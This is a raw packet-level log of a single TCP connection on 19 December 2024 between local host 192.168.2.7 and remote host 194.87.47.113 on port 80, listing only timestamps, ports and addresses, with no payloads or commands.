Dec 19, 2024 08:47:22.961203098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.961436987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.962316990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.962379932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.962615013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.963386059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.963443041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.963846922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.964462042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.964629889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.964804888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.965531111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.965692997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.965851068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.966626883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.966691017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.966784954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.967750072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.967794895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.967885017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.968902111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.969033957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.969039917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.969913006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.969980955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.970204115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.970983982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.971029043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.971415043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.971427917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.971441031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.971493959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.971719027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.971827030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.971896887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.975039959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.975145102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.975189924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.976135015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.976186991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.976275921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.976586103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.976666927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.976732969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.978445053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.978456974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.978502035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.979048967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.979115963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.979335070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.980928898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.980988026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.981551886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.981564045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.981575966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.981744051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.982192039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.982542038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.982706070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.983194113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.983279943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.983355045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.984405041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.984503984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.984827042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.985443115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.985456944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.985553980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.986428022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.986649990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.986730099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.987571955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.987688065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.987859011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.988733053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.988899946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.989018917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.989422083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.989434004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.989459038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.989757061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.989849091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.989849091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.990427017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.990474939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.990750074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.992233992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.992455959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.992609024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.993793964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.993801117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.994249105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.994374037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.994402885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.994611025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.995923996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.995932102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.996372938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:22.996728897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:22.997389078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.103271961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.103393078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.103463888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.103667021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.153465986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.171674967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.171797991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.171876907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.172171116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.172554970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.172595024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.173190117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.174283028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.174417973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.174421072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.174437046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.174478054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.175395966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.175745964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.175837040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.176471949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.176667929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.176728010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.177581072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.177793026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.177833080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.178767920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.179117918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.179244995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.179812908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.179996014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.180094004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.180911064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.181097984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.181145906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.182663918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.183166981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.183175087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.183273077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.183716059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.183801889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.184376955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.184735060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.184797049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.185638905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.186023951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.186113119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.186410904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.186819077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.186985016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.187491894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.187699080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.187750101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.188610077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.188873053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.188960075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.189728975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.189941883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.190012932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.190828085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.191035986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.191119909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.191901922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.192105055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.192181110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.193020105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.193715096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.193789005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.194124937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.194611073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.194777012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.195233107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.195425034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.195647001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.196325064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.196634054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.196751118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.197426081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.197868109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.198012114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.198523998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.198741913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.198827028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.199645042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.199837923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.199904919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.200738907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.200933933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.201205015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.201850891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.202049971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.202192068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.202974081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.203701973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.203763962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.204106092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.204122066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.204521894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.205149889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.205710888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.205775976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.206248999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.206928015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.206984997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.207360029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.207541943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.207695007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.208472967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.208868980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.208933115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.209578991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.209790945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.209988117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.210644960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.210839033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.210993052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.211733103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.212255001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.212369919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.312290907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.312552929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.312730074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.312905073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.356501102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.383008957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.383229017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.383337975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.383618116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.383909941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.383986950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.386291981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.387005091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.387027025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.387125969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.387825012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.387835979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.387924910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.388585091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.388600111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.388606071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.388737917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.388737917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.389305115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.389678001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.389750957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.390221119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.390367031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.390448093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.391308069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.391513109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.391666889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.392437935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.392446995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.392508030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.393523932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.394138098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.394186020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.394625902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.394938946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.395318031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.395947933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.396208048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.396543026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.396953106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.397058010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.397149086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.397917032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.398135900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.398251057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.399025917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.399205923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.399334908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.400151968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.400341988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.400435925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.401207924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.401423931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.401581049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.402410030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.402791977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.402932882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.403422117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.403639078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.403691053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.404561996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.404836893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.404980898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.405608892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.406116009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.406238079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.406718016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.407191038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.407339096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.407825947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.408092022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.408386946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.408946991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.409169912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.409296036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.410096884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.410401106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.410520077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.411164045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.411355019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.411416054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.412252903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.412446022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.412687063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.413336039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.413949966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.414326906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.414459944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.415399075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.415452957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.415630102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.415640116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.416408062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.416701078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.416847944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.417006016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.417761087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.418143034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.418270111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.418842077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.419027090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.419209003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.419949055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.420433044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.420543909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.421107054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.421305895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.421389103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.422174931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.422353983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.422549009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.423266888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.423449039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.423502922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.424408913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.424582005 CET	80	49707	194.87.47.113	192.168.2.7
